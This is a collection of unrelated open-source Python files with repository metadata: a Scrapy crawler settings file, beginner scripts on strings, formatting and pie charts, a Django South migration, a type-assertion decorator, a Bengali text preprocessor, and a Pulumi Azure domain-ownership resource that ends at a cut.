ec20e0f130c9b07be9f40df8385ecc71d1678676 | 1b3fc35ada474601a76de3c2908524336d6ca420 | /day07/作业/tencent/tencent/settings.py | d96bd9dfc78cc95ce6fafa6d33a2745ee7a9c4af | [] | no_license | dqsdatalabs/Internet-worm | db3677e65d11542887adcde7719b7652757a3e32 | 62f38f58b4fa7643c482077f5ae18fff6fd81915 | refs/heads/master | 2022-01-16T14:29:52.184528 | 2018-12-25T08:46:08 | 2018-12-25T08:46:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,079 | py | # -*- coding: utf-8 -*-
# Scrapy settings for tencent project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'tencent'
SPIDER_MODULES = ['tencent.spiders']
NEWSPIDER_MODULE = 'tencent.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'tencent (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'tencent.middlewares.TencentSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'tencent.middlewares.TencentDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'tencent.pipelines.TencentPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"aaa1058169464@126.com"
] | aaa1058169464@126.com |
b2625f2e12494973dd673cb354d1c0ce6a6f5a40 | 9ffc948ff6633a1876883b97f3b2ce12e733e094 | /Programs/catnames.py | c384d4079a5d7d8d65d696da554445d95ca9ad64 | [] | no_license | SrinuBalireddy/Python_Snippets | b529c4b93e774970a7e5a7961fdca89cc4732b46 | f032887b1c7ec261aa70adf03bcf0a43acef75ad | refs/heads/master | 2022-12-18T17:37:36.488430 | 2020-09-08T09:59:36 | 2020-09-08T09:59:36 | 274,892,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | # Write your code here :-)
catnames = []
while True:
print('Enter you cat name')
name = input()
if name == '':
break
catnames = catnames+[name]
print('Your cat names are')
for names in catnames:
print(' '+names)
| [
"srinuuipath@gmail.com"
] | srinuuipath@gmail.com |
554e52f3092452144023bde3ebfbf39ccb24dc5c | 773869c5d8c85c56027bc453ad2cb3cd0fd8d46a | /pie chart.py | e7d14d2d8262b1b467d4db21051dff1292ffbcc4 | [] | no_license | saikiran335/python-projects | c8ac60f3977f5cc693b4c373a06b6b325edd8ffa | bb1409c427fd99f2c180fc24bc76d401717aee78 | refs/heads/master | 2023-05-01T17:10:15.851278 | 2021-05-25T10:23:06 | 2021-05-25T10:23:06 | 365,147,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 329 | py | import matplotlib.pyplot as plt
slices=[5,2,7,8]
activities=['sleeping','eating','walking','talking']
cols=['r','b','g','c']
plt.pie(slices,
labels=activities,
colors=cols,
startangle=90,
shadow=True,
explode=[0,0.1,0.2,0.3],
autopct='%1.1f%%')
plt.title('pie chart')
plt.show()
| [
"saisaikiran335@gmail.com"
] | saisaikiran335@gmail.com |
94dabe5bc97142793e56abc7a975599c561890d5 | a707013b51935acd329814d8cc9dc408911a9cfa | /cmsplugin_configurableproduct/migrations/0007_auto__del_field_cproducttypesplugin_template__add_field_cproducttypesp.py | 9af2b6d9d79304ef9ebdfa2b05f3bdf7b6242d78 | [
"BSD-2-Clause"
] | permissive | ZibMedia/cmsplugin-configurableproduct | 2d4ff3b4f09210a6d448251b9bdec01d0214b344 | 65269b3ce697ac78ddff14168eed9b6883eb98f0 | refs/heads/master | 2021-01-24T01:28:47.826763 | 2013-05-28T11:17:22 | 2013-05-28T11:17:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,090 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'CProductTypesPlugin.template'
db.delete_column('cmsplugin_cproducttypesplugin', 'template')
# Adding field 'CProductTypesPlugin.container_template'
db.add_column('cmsplugin_cproducttypesplugin', 'container_template', self.gf('django.db.models.fields.CharField')(default=('Default', 'cmsplugin_configurableproduct/product-types/containers/default.html'), max_length=256, null=True, blank=True), keep_default=False)
# Adding field 'CProductTypesPlugin.item_template'
db.add_column('cmsplugin_cproducttypesplugin', 'item_template', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True), keep_default=False)
# Deleting field 'CProductsPlugin.template'
db.delete_column('cmsplugin_cproductsplugin', 'template')
# Adding field 'CProductsPlugin.container_template'
db.add_column('cmsplugin_cproductsplugin', 'container_template', self.gf('django.db.models.fields.CharField')(default=('Default', 'cmsplugin_configurableproduct/product-list/containers/default.html'), max_length=256, null=True, blank=True), keep_default=False)
# Adding field 'CProductsPlugin.item_template'
db.add_column('cmsplugin_cproductsplugin', 'item_template', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True), keep_default=False)
def backwards(self, orm):
# Adding field 'CProductTypesPlugin.template'
db.add_column('cmsplugin_cproducttypesplugin', 'template', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True), keep_default=False)
# Deleting field 'CProductTypesPlugin.container_template'
db.delete_column('cmsplugin_cproducttypesplugin', 'container_template')
# Deleting field 'CProductTypesPlugin.item_template'
db.delete_column('cmsplugin_cproducttypesplugin', 'item_template')
# Adding field 'CProductsPlugin.template'
db.add_column('cmsplugin_cproductsplugin', 'template', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True), keep_default=False)
# Deleting field 'CProductsPlugin.container_template'
db.delete_column('cmsplugin_cproductsplugin', 'container_template')
# Deleting field 'CProductsPlugin.item_template'
db.delete_column('cmsplugin_cproductsplugin', 'item_template')
models = {
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
'cmsplugin_configurableproduct.cproductsplugin': {
'Meta': {'object_name': 'CProductsPlugin', 'db_table': "'cmsplugin_cproductsplugin'", '_ormbases': ['cms.CMSPlugin']},
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['configurableproduct.ProductType']", 'symmetrical': 'False'}),
'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'container_template': ('django.db.models.fields.CharField', [], {'default': "('Default', 'cmsplugin_configurableproduct/product-list/containers/default.html')", 'max_length': '256', 'null': 'True', 'blank': 'True'}),
'filter_action': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'filter_product_attributes': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'hide_empty_categories': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'item_template': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
},
'cmsplugin_configurableproduct.cproducttypesplugin': {
'Meta': {'object_name': 'CProductTypesPlugin', 'db_table': "'cmsplugin_cproducttypesplugin'", '_ormbases': ['cms.CMSPlugin']},
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['configurableproduct.ProductType']", 'null': 'True', 'blank': 'True'}),
'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'container_template': ('django.db.models.fields.CharField', [], {'default': "('Default', 'cmsplugin_configurableproduct/product-types/containers/default.html')", 'max_length': '256', 'null': 'True', 'blank': 'True'}),
'hide_empty_categories': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'item_template': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Categories'", 'max_length': '128', 'null': 'True', 'blank': 'True'})
},
'cmsplugin_configurableproduct.producttypeicon': {
'Meta': {'unique_together': "(('product_type', 'name'),)", 'object_name': 'ProductTypeIcon'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'small'", 'max_length': '128'}),
'product_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'icons'", 'to': "orm['configurableproduct.ProductType']"})
},
'configurableproduct.productbooleanfield': {
'Meta': {'object_name': 'ProductBooleanField'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'configurableproduct.productcharfield': {
'Meta': {'object_name': 'ProductCharField'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'configurableproduct.productfloatfield': {
'Meta': {'object_name': 'ProductFloatField'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'configurableproduct.productimagefield': {
'Meta': {'object_name': 'ProductImageField'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'configurableproduct.producttype': {
'Meta': {'object_name': 'ProductType'},
'boolean_fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['configurableproduct.ProductBooleanField']", 'null': 'True', 'through': "orm['configurableproduct.TypeBoolean']", 'blank': 'True'}),
'char_fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['configurableproduct.ProductCharField']", 'null': 'True', 'through': "orm['configurableproduct.TypeChar']", 'blank': 'True'}),
'float_fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['configurableproduct.ProductFloatField']", 'null': 'True', 'through': "orm['configurableproduct.TypeFloat']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['configurableproduct.ProductImageField']", 'null': 'True', 'through': "orm['configurableproduct.TypeImage']", 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
},
'configurableproduct.typeboolean': {
'Meta': {'ordering': "['order']", 'object_name': 'TypeBoolean'},
'field': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductBooleanField']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductType']"})
},
'configurableproduct.typechar': {
'Meta': {'ordering': "['order']", 'object_name': 'TypeChar'},
'field': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductCharField']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductType']"})
},
'configurableproduct.typefloat': {
'Meta': {'ordering': "['order']", 'object_name': 'TypeFloat'},
'field': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductFloatField']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductType']"})
},
'configurableproduct.typeimage': {
'Meta': {'ordering': "['order']", 'object_name': 'TypeImage'},
'field': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductImageField']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['configurableproduct.ProductType']"})
}
}
complete_apps = ['cmsplugin_configurableproduct']
| [
"zeno.jiricek@urpages.net"
] | zeno.jiricek@urpages.net |
7849b2b7c4842ebe127760a458ab217b97e6dfe3 | 1f6a162de77fca1d74af3f341ec815825c15f54c | /strings.py | 0ded33a6a410dd31407cdbdaee0c8749509fe68d | [] | no_license | nickdevp/pysamp | 8b96f93ad15b7caa080f4790b240a68476ff7461 | 22fdf234878bf62400cb7604ab582cf9c46a491f | refs/heads/master | 2021-01-13T01:31:27.335085 | 2015-06-28T21:12:43 | 2015-06-28T21:12:43 | 38,157,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py |
from __future__ import print_function
# == REPLACEMENT ==
# NOTE: case insensitive replacement requires 're' module
text = "Hello World World"
print(text) # "Hello World World"
print(text.replace("World", "Nick")) # "Hello Nick Nick"
print(text.replace("World", "Nick", 1)) # "Hello Nick World"
print(text) # "Hello World World"
# == SLICING ==
# SYNTAX: text[start:end:step]
# 'end' and 'step' are optional
# text[start] = char at position 'start'
# text[start:] = substring from 'start' to end of 'text'
# text[start:end] = substring from 'start' to before 'end'
text = "Nick rocks"
# 0 is before 'N'
# 1 is before 'i' and after 'N'
# 2 is before 'c' and after 'i'
# -1 is before 's'
print(text[0:4]) # "Nick"
print(text[-5:]) # "rocks"
print(text[-5:-3]) # "ro"
| [
"nickdevp@outlook.com"
] | nickdevp@outlook.com |
52009571a059032b36dab76217410a7d0c185d26 | cd5c8ac975b9a78d020815d05be60bfebd263329 | /9/9.7.py | 3a074c179819850b02122551742fe6a5edaabba2 | [] | no_license | ttlttl/PythonCookBook-study | 10dbc72398d62de4e0c625eb3b61c7e084792f2f | 7c8a496874f34fb9efc57335644d2cd67839144d | refs/heads/master | 2021-01-21T04:59:50.554195 | 2016-06-15T14:37:59 | 2016-06-15T14:37:59 | 48,616,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,235 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
利用装饰器对函数参数强制执行类型检查。
inspect.signature()函数允许我们从一个可调用对象中提取出参数签名信息。
"""
from inspect import signature
from functools import wraps
def typeassert(*ty_args, **ty_kwargs):
def decorate(func):
if not __debug__:
return func
sig = signature(func)
#Map function argument names to supplied types
bound_types = sig.bind_partial(*ty_args, **ty_kwargs).arguments
@wraps(func)
def wrapper(*args, **kwargs):
bound_values = sig.bind(*args, **kwargs)
for name, value in bound_values.arguments.items():
if name in bound_types:
if not isinstance(value, bound_types[name]):
raise TypeError(
'Argument {} must be {}'.format(name, bound_types[name])
)
return func(*args, **kwargs)
return wrapper
return decorate
if __name__ == '__main__':
@typeassert(int, z=int)
def spam(x, y, z=42):
print(x, y, z)
spam(1, 2, 3)
spam(1, 'hello', 3)
spam(1,'hello', 'world')
| [
"wangmingape@gmail.com"
] | wangmingape@gmail.com |
1f0bb8225ed57a6b8199fb94bf797a376b9c23ea | 8201e0e2ab1c528e6b445f12c19c4f39f14ab8da | /08-16/formatting.py | 2e0aa9f20eceefb5db017adea2c62694ea7428dd | [] | no_license | ucsb-cs8-m18/code-from-class | c8d1d3af8f35e29edd8d9b66694662219e956029 | 5658ac2dca3a29e948e14456e6adbea222bce209 | refs/heads/master | 2020-03-25T16:02:55.666072 | 2018-09-12T18:03:17 | 2018-09-12T18:03:17 | 143,912,380 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py | month = 8
day = 16
year = 2018
# separate things between commas with the empty string
print(month, "/", day, "/", year, sep="")
print(str(month) + "/" + str(day) + "/" + str(year))
print(month, day, year, sep="/")
# "...{}..." is a format string
print("{0}/{1}/{2}".format(month, day, year))
print("{1}/{0}/{2}".format(month, day, year))
print("{2}/{0}/{1}".format(month, day, year))
# this is the same as print("{0}/{1}/{2}".format(month, day, year))
print("{}/{}/{}".format(month, day, year))
# let's make a times table now
# the :5 part sets the width of the thing you're printing
# to be 5 spaces wide
print("{0:5}".format(42))
for i in range(1, 6):
print("{} {} {} {} {}".format(i*1, i*2, i*3, i*4, i*5))
for i in range(1, 6):
print("{:2} {:2} {:2} {:2} {:2}".format(i*1, i*2, i*3, i*4, i*5))
# apparently the < left aligns things
for i in range(1, 6):
print("{:<2} {:<2} {:<2} {:<2} {:<2}".format(i*1, i*2, i*3, i*4, i*5))
# end is usually set to "\n", which is a new line
print(42, end="")
print(" hi", end="")
| [
"lawtonnichols@gmail.com"
] | lawtonnichols@gmail.com |
491d28bb4be3205a28e15b1faebc1cd701d2860f | 80d5031342288c188dc7a73bbe07c4770c5b8a6f | /domain/game/ended.py | 2339bea3b00d1919cd2d75c7fb01cf04c305d3c4 | [] | no_license | theodormanolescu/hero | 19b2d6b897e88400ebdb93b07514255d925d5257 | a05226437c1430c698c54c4b54ccb99fcc57309e | refs/heads/master | 2023-06-04T04:35:13.273992 | 2021-06-22T19:17:27 | 2021-06-22T19:17:27 | 379,178,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | from application.event_interface import EventInterface
class Ended(EventInterface):
def __init__(self, fights: int, rounds: int):
self.fights: int = fights
self.rounds: int = rounds
def get_name(self) -> str:
return 'game_ended'
| [
"thedor.manolescu@emag.ro"
] | thedor.manolescu@emag.ro |
084c743b67522a9f0ccc3613ab455aa6bbf74ee1 | 633d7e9174c967b0f77830c630ec0a7e7cbee901 | /src/task3/1_hindi_bengali_bilstm_sa_jdil/bengali_preprocess.py | ca527cf9b7f5e326cc4335f59d6386e6609cfbd4 | [
"MIT"
] | permissive | pritiyadav888/nnti_hindi_bengali_sentiment_analysis | d9694de7092ec9a51041113647c606aaeb70d8e2 | 0583ed0817824ad83f458f3be5bfab7b6e13a629 | refs/heads/main | 2023-07-27T02:39:55.202261 | 2021-09-10T14:48:33 | 2021-09-10T14:48:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,959 | py | import re
"""
Performs basic text cleansing on the unstructured field
and adds additional column to the input dataframe
"""
class Preprocess:
def __init__(self, stpwds_file_path):
"""
Initializes regex patterns and load stopwords
"""
self.USERNAME_PATTERN = r'@([A-Za-z0-9_]+)' ## regex pattern form removing user names
self.PUNCTUATION_PATTERN = '\'’|!@$%^&*()_+<>?:.,;-' ## all punctuation symbols to be removed
self.STOPWORDS_PATH = stpwds_file_path ## set stopwords file path
self.load_stopwords() ## load stopwords from file
def load_stopwords(self):
"""
Loads stopwords from file
"""
stopwords_bengali_file = open(self.STOPWORDS_PATH, 'r', encoding='utf-8') ## open file
self.stopwords_bengali = [line.replace('\n','') for line in stopwords_bengali_file.readlines()] ## add keywords to list for later use
def remove_punctuations(self, text):
"""
Removes punctuations from text field
"""
return "".join([c for c in text if c not in self.PUNCTUATION_PATTERN])
def remove_stopwords(self, text):
"""
Removes stopwords from text field
"""
return " ".join([word for word in text.split() if word not in self.stopwords_bengali])
def remove_usernames(self, text):
"""
Removes usernames from text field
"""
return re.sub(self.USERNAME_PATTERN, '', text)
def perform_preprocessing(self, data):
data['clean_text'] = data.sentence.apply(lambda text: text.lower()) ## normalizing text to lower case
data['clean_text'] = data.clean_text.apply(self.remove_usernames)## removing usernames
data['clean_text'] = data.clean_text.apply(self.remove_punctuations)## removing punctuations
data['clean_text'] = data.clean_text.apply(self.remove_stopwords)## removing stopwords
return data | [
"sk28671@gmail.com"
] | sk28671@gmail.com |
b120a89e2d2dd9e418954d016dc61f794cb03dc7 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/domainregistration/v20201001/domain_ownership_identifier.py | 0686f0d099df8d96bf3e28acd50d6042d8b40850 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,342 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = ['DomainOwnershipIdentifierArgs', 'DomainOwnershipIdentifier']
@pulumi.input_type
class DomainOwnershipIdentifierArgs:
def __init__(__self__, *,
domain_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
ownership_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DomainOwnershipIdentifier resource.
:param pulumi.Input[str] domain_name: Name of domain.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] name: Name of identifier.
:param pulumi.Input[str] ownership_id: Ownership Id.
"""
pulumi.set(__self__, "domain_name", domain_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if ownership_id is not None:
pulumi.set(__self__, "ownership_id", ownership_id)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Input[str]:
"""
Name of domain.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
Name of the resource group to which the resource belongs.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of identifier.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="ownershipId")
def ownership_id(self) -> Optional[pulumi.Input[str]]:
"""
Ownership Id.
"""
return pulumi.get(self, "ownership_id")
@ownership_id.setter
def ownership_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ownership_id", value)
class DomainOwnershipIdentifier(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
ownership_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Domain ownership Identifier.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] domain_name: Name of domain.
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] name: Name of identifier.
:param pulumi.Input[str] ownership_id: Ownership Id.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DomainOwnershipIdentifierArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Domain ownership Identifier.
:param str resource_name: The name of the resource.
:param DomainOwnershipIdentifierArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DomainOwnershipIdentifierArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
ownership_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DomainOwnershipIdentifierArgs.__new__(DomainOwnershipIdentifierArgs)
if domain_name is None and not opts.urn:
raise TypeError("Missing required property 'domain_name'")
__props__.__dict__["domain_name"] = domain_name
__props__.__dict__["kind"] = kind
__props__.__dict__["name"] = name
__props__.__dict__["ownership_id"] = ownership_id
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:domainregistration:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20150401:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20180201:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20190801:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20200601:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20200901:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20201201:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210101:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210115:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210201:DomainOwnershipIdentifier")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DomainOwnershipIdentifier, __self__).__init__(
'azure-native:domainregistration/v20201001:DomainOwnershipIdentifier',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DomainOwnershipIdentifier':
"""
